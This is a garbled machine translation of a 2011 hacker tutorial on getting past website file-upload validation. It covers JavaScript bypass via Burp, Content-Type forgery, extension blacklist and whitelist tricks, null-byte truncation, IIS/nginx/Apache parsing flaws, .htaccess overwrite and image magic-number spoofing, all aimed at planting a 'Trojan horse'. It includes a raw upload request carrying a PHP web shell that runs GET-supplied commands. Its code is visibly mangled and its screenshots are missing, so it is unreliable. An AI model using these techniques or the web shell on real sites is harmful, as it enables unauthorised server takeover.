Upload verification Bypass

Bypass Upload Validation Framework V0.9

CasperKid [S.Y. C]

2011.7.29

Directory
0x01 client verification bypass (javascript extension detection)
0x02 server verification bypass (http request Packet detection)
-Content-type (Mime type) Detection
0x03 server verification bypass (extension detection)
-Blacklist Detection
-White List Detection
-. Htaccess file attack
0x04 server verification bypass (file integrity detection)
-File Header Detection
-Image size and Related Information Detection
-File loading Detection
0x05 detection bypass analysis in various situations
0x06 Brief Analysis on Image Code Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Preface
In today's increasingly secure system, SQL Injection vulnerabilities are hard to appear on websites with high security, such as some good ones. NET or JAVA frameworks are basically parameterized transmission of user input, directly blocking injection attacks. In non-php web security, there are two most powerful attacks: SQL Injection and upload bypass. (Php also has the remote file inclusion or code injection vulnerability)

Generally, as long as you can register an ordinary user, you can often find a place to upload an Avatar or an attachment. These areas are a good break. If you have a way to bypass upload verification, and find the web path of a Trojan horse to basically implement this site.

This paper is not perfect, but it is comprehensive in the classification framework. Due to limited personal experience, the coverage is not comprehensive. There are also many places where I have no chance to practice and map it out, I hope that you will have some similar experiences, so that I can improve this paper and make your communication more valuable.

 

Blog: hi.baidu.com/hackercasper
 
0x01 Client Side verification bypass (javascript extension detection)

Open the http reverse proxy tool burp
First Click Upload a 2012.asa

No Upload
There is no content in the burp, and a warning box is displayed. You can see that it is a client that verifies javascript.
You only need to disable it or use burp for proxy modification.

 
 
Here, I use burp for proxy modification to change the file extension to jpg first.

 

Then Upload
The current file name is 2012.jpg.

 

Change jpg to asp in burp
 

 
Then upload again
Finally, you can see that asp is successfully uploaded.

 
 
0x02 server verification bypass (http request Packet detection)

-Content-type (Mime-type): If the upload. php code on the server is as follows:
<? Php
If ($ _ FILES ['userfile'] ['type']! = "Image/gif") {// detect Content-type
Echo "Sorry, we only allow uploading GIF images ";
Exit;
}
$ Uploaddir = 'uploads /';
$ Uploadfile = $ uploaddir. basename ($ _ FILES ['userfile'] ['name']);
If (move_uploaded_file ($ _ FILES ['userfile'] ['tmp _ name'], $ uploadfile )){
Echo "File is valid, and was successfully uploaded. \ n ";
} Else {
Echo "File uploading failed. \ n ";
}
?>
Then we can modify the Content-Type of the request package POST/upload. php HTTP/1.1
TE: deflate, gzip; q = 0.3
Connection: TE, close
Host: localhost
User-Agent: libwww.perl/5.803
Content-Type: multipart/form-data; boundary = xy1_content-Length: 155
-- Xy.pdf
Content-Disposition: form-data; name = "userfile"; filename = "shell. php" Content-Type: image/gif (originally Content-Type: text/plain)
<? Php system ($ _ GET ['command']);?>
-- Xybench --

HTTP/1.1 200 OK
Date: Thu, 31 May 2007 14:02:11 GMT Server: Apache
X-Powered-By: PHP/4.4.4-pl6-gentoo
Content-Length: 59
Connection: close
Content-Type: text/html
<Pre> File is valid, and was successfully uploaded. </pre>
 
Content-Type of HTTP Packets detected by the server can be bypassed by similar methods.

 
 
0x03 server verification bypass (extension detection)
-Blacklist detection blacklist security is not as secure as the whitelist is, at least it is more vulnerable to attacks than the whitelist.
Generally, there is a special blacklist file that contains common dangerous script files, such as fckeditor 2.4.3 or the blacklist of previous versions.

 

1. Find the fish with the blacklist extension-for example, the asa and cer files are missing.

2. Possible case-insensitive vulnerabilities-such as aSp and pHp

3. special file name construction-for example, change the file name in the sent http packet to help. asp. or help. asp _ (the underline is empty). This naming method is not allowed in windows, so you need to modify it in burp and so on, and then bypass the verification, windows automatically removes the following vertices and spaces.

4. IIS or nginx file name resolution vulnerability-such as help.asp;.jpg or http://www.xx.com/help.jpg/2.php
Here pay attention to the so-called nginx file name parsing vulnerability is actually php-fpm file name parsing vulnerability for details, see the http://www.cnbeta.com/articles/111752.htm

X 00 truncation bypass-this is caused by a combined logic Vulnerability
Give a simple pseudocode
Name = getname (http request) // If the obtained file name is help. asp. jpg (0x00 after asp)
Type = gettype (name) // In the gettype () function, the processing method is to scan the extension from the back to the back, so it is determined as jpg if (type = jpg)
SaveFileToPath (UploadPath. name, name) // However, 0x00 is used as the file name truncation.
// Save it to the path with help. asp

6. Double Extension DNS bypass attack (1)-web service-based parsing logic, such as the description in Apache manual
"Files can have more than one extension, and the order of the extensions is normally irrelevant. for example, if the file welcome.html. fr maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. if more than one extension is given which maps onto the same type of meta-information, then the one to the right will be used, could t for ages and content encodings. for example, if. gif maps to the MIME-type image/gif and. html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with the MIME-type text/html."

If you upload a file named help. asp.123
First, the extension 123 is not in the extension blacklist, and then the extension 123 is not in the Apache resolvable Extension
List, this time it will search for the next resolvable extension, or find. php, and finally Execute
 
7. Dual-extension DNS bypass attack (2)-web service-based parsing method if such a line of configuration exists in Apache conf
Php5-script. php AddHandler
In this case, as long as the file name contains. php
Even if the file name is test2.php.jpg, It will be executed in php.

 

8. Dangerous parsing bypass attacks-if the web service-based parsing method has such a line of configuration in Apache conf
AddType application/x-httpd-php. jpg
Even if the extension is jpg, it can be executed in php.

 
 
-White List Detection

The whitelist is relatively safer than the blacklist, but it is absolutely safer if you do not know it.

1. Special file name construction (3rd same blacklist attacks)
2. IIS or nginx file name resolution Vulnerability (4th same blacklist attacks)
3. 0x00 truncation bypass (5th same blacklist attacks)

 

 

-. Htaccess file attacks, whether blacklisted or whitelist, are directly attacked. The htaccess file mentioned in PHP manual:
Move_uploaded_file section, there is a warning which states
'If the destination file already exists, it will be overwritten. 'If PHP security is not configured properly
You can use the move_uploaded_file function to overwrite your own. htaccess file.
In this way, the resolution list can be defined at will.
 
0x04 server verification bypass (file integrity detection)

-The file header detection mainly starts to set the Phantom number of the image file in the file content.

To bypass jpg file detection, you must write the value at the beginning of the file

 

 


 

The value that must be written at the beginning of the file to bypass the gif file detection.

To bypass the png file detection, the upper and lower values must be written at the beginning of the file.

Add your own Trojan horse to the end of the file header.

 

 

 

-The getimagesize () function is commonly used for image size and related information detection.
You only need to forge the file header, and then you can add some file information on the basis of the magic number.
A bit like the structure below
GIF89a (... some binary data...) <? Php phpinfo ();?> (... Skipping the rest of binary data ...)
 
-File loading Detection

This is the most abnormal detection. Generally, it calls APIs or functions to perform file loading tests. The common test is image rendering, even secondary rendering (as mentioned later) Attacks on the file loader are generally two ways. One is rendering test bypass, and the other is attacking the file loader itself.

Rendering test Bypass
Use GIMP to inject code into an image
Using winhex to view data can be analyzed. The principle of this type of tool is to find a blank area without damaging the rendering of the file itself to fill the code. Generally, it is the comment area of the image.
Basically, rendering tests can be bypassed.

 

 
However, if you encounter abnormal secondary rendering, You can't bypass it. It is estimated that you can only attack the file loader.
For example, before uploading a file, the data of the file is as follows:

 

Then upload the jpg file, but download it back to the local device to find something strange.

 
 

The uploaded image is rendered twice.
The new JPG image contains this
CREATOR: gd-jpeg v1.0 (using ijg jpeg v62)
It looks like the GD library of the called gd php
 
The same is true for tested gif files.
The original file content is (although the file name is 2.jpg, the actual file format is gif)

 

After uploading and downloading the file, we can see that the file has been re-rendered and the code is gone.

 
 
An error is triggered to check which API or function is used for secondary rendering.

When an error is reported when a gif file with incomplete file data is uploaded, the function imagecreatefromgif () is used in the background.

 

When an error is reported when a png file with incomplete file data is uploaded, the function imagecreatefrompng () is used in the background.

 

It is almost impossible to perform secondary rendering and try to bypass personal experience. It is equivalent to capturing the original part of the image data, re-rendering with your own APIs or functions. In this process, the non-image data part is directly isolated.

If you want to attack the file loader, the common attack is overflow. After uploading your own malicious files, when the file loader on the Service performs a load test, triggered attack: execute shellcode such as access/mdb Overflow
You can refer to the http://lcx.cc /? Foxnews00001542.html
 
0x05 detection bypass analysis in various situations

Client A verification bypass (javascript extension detection)
You can bypass client-side verification by using reverse proxy tools (such as burp) or disabling js

Server B verification bypass (http request Packet detection)
-Content-type (Mime type): Uses reverse proxy tools (such as burp) for Content-type forgery.

C server verification bypass (extension detection)
-Blacklist Detection
Find the fish with the blacklist extension-for example, the above misses the possibility of case-insensitive vulnerabilities such as asa and cer-such as aSp and pHp
Special file name construction-for example, change the file name in the sent http packet to help. asp. Or help. asp _ (the underline is a space)
IIS or nginx file name resolution vulnerability-such as help.asp;.jpg or http://www.xx.com/help.jpg/2.php
0x00 truncation bypass-this is a dual-extension parsing bypass attack caused by a combined logic Vulnerability (1)-web service-based parsing logic
Double-extension DNS bypass attack (2)-web service-based Parsing Method dangerous parsing bypass attack-web service-based Parsing Method
-White List Detection
Special file name structure (3rd same blacklist attacks)
IIS or nginx file name resolution Vulnerability (4th same blacklist attacks)
0x00 truncation bypass (5th same blacklist attacks)

-. Htaccess file attack
If PHP security is not configured, use your own. htaccess to overwrite the original file on the service.